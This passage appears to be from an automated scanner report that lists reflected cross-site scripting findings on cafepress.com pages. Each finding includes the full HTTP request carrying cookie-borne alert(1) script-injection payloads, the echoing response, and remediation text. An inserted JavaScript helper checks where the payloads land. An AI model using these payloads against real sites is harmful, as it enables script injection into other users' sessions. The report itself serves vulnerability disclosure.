__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 59420
Date: Sun, 26 Dec 2010 13:47:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+underwear-panties

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3af</script><script>alert(1)</script>ca50a4bf9d6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
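The "echoed unmodified" verdict above rests on a simple check: the submitted marker appears byte-for-byte in the response, inside a script element, and the characters in it break the enclosing context. The following is an added example that reimplements that check so a reviewer can re-run it against a saved response; it is not the scanner's code. The response excerpts are constructed from the lines quoted in this report and wrapped in an assumed inline <script> element (the report's excerpts are cut before the opening tag). Cookie values and variable names are the report's; the function names are this example's.

```javascript
// Added example, not part of the report or the scanner. Classifies where a
// reflected cookie value lands in a saved response and whether it escapes
// its context. Excerpts are constructed from the report's response lines;
// the <script> wrapper around them is assumed.

const CP_V_PAYLOAD = 'f16ed"-alert(1)-"d43c21ef02f';
const CP_ST_PAYLOAD = '7c3af</script><script>alert(1)</script>ca50a4bf9d6';

const RESPONSE_CP_V = [
  '<script type="text/javascript">', // assumed wrapper
  '   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f";',
  '   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID',
  '</script>',
].join('\n');

const RESPONSE_CP_ST = [
  '<script type="text/javascript">', // assumed wrapper
  "window.cafepress.tealeaf = {};",
  "window.cafepress.tealeaf.pageLandingType = 'SearchResults'",
  "window.cafepress.tealeaf.searchTerm = '7c3af</script><script>alert(1)</script>ca50a4bf9d6'",
  "window.cafepress.tealeaf.salesChannel = 'Marketplace'",
  '</script>',
].join('\n');

// Constructed negative case: the same statement with the quotes escaped.
const RESPONSE_FIXED = [
  '<script type="text/javascript">',
  '   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf16ed\\"-alert(1)-\\"d43c21ef02f";',
  '</script>',
].join('\n');

// Constructed case outside any script element.
const RESPONSE_HTML = '<title>f16ed"-alert(1)-"d43c21ef02f</title>';

// Is the end of `prefix` inside an open <script> element? Follows the HTML
// tokenizer: script data ends at the first "</script", nothing else.
function insideScriptElement(prefix) {
  let open = false;
  const re = /<(\/?)script\b/gi;
  let m;
  while ((m = re.exec(prefix)) !== null) open = m[1] === '';
  return open;
}

// Which JS string delimiter, if any, is open at the end of `prefix`?
// Line-local heuristic: enough for one statement per line, as here.
function quoteContextOnLine(prefix) {
  const line = prefix.slice(prefix.lastIndexOf('\n') + 1);
  let quote = null;
  for (let i = 0; i < line.length; i++) {
    const ch = line[i];
    if (quote && ch === '\\') { i++; continue; } // skip an escaped character
    if (!quote && (ch === '"' || ch === "'")) quote = ch;
    else if (quote === ch) quote = null;
  }
  return quote;
}

// Locate a verbatim reflection of `payload` and classify its context.
function locateReflection(body, payload) {
  const offset = body.indexOf(payload);
  if (offset < 0) return { reflected: false };
  const prefix = body.slice(0, offset);
  const inScript = insideScriptElement(prefix);
  const quote = inScript ? quoteContextOnLine(prefix) : null;
  let breakout = 'contained';
  if (!inScript) breakout = 'outside-script';
  else if (/<\/script[\s\/>]/i.test(payload)) breakout = 'script-element-terminated';
  else if (quote && payload.includes(quote)) breakout = 'string-terminated';
  return { reflected: true, offset, inScript, quote, breakout };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('cp-v ', locateReflection(RESPONSE_CP_V, CP_V_PAYLOAD));
  console.log('cp_st', locateReflection(RESPONSE_CP_ST, CP_ST_PAYLOAD));
  console.log('fixed', locateReflection(RESPONSE_FIXED, CP_V_PAYLOAD));
  console.log('html ', locateReflection(RESPONSE_HTML, CP_V_PAYLOAD));
}
```

The escaped variant is reported as not reflected at all, because the check is for a byte-exact echo: once the application alters a single delimiter the marker no longer matches, which is the right outcome for a regression test but also a reminder that "not found" does not mean "safely encoded". The outside-script case is deliberately left unclassified; an HTML-body reflection needs its own context analysis.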

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7c3af</script><script>alert(1)</script>ca50a4bf9d6; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 59441
Date: Sun, 26 Dec 2010 13:47:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '7c3af</script><script>alert(1)</script>ca50a4bf9d6'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.70. http://www.cafepress.com/+water-bottles [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+water-bottles

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35244"-alert(1)-"6a269d15e05 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 61013
Date: Sun, 26 Dec 2010 13:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.71. http://www.cafepress.com/+water-bottles [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+water-bottles

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2b6f</script><script>alert(1)</script>6386f2e7ab was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c2b6f</script><script>alert(1)</script>6386f2e7ab; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 61029
Date: Sun, 26 Dec 2010 13:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'c2b6f</script><script>alert(1)</script>6386f2e7ab'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+womens-tank-tops

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec3ed"-alert(1)-"6cdf0b2af4a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 61745
Date: Sun, 26 Dec 2010 13:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+womens-tank-tops

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae66d</script><script>alert(1)</script>eabb41eb2b2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
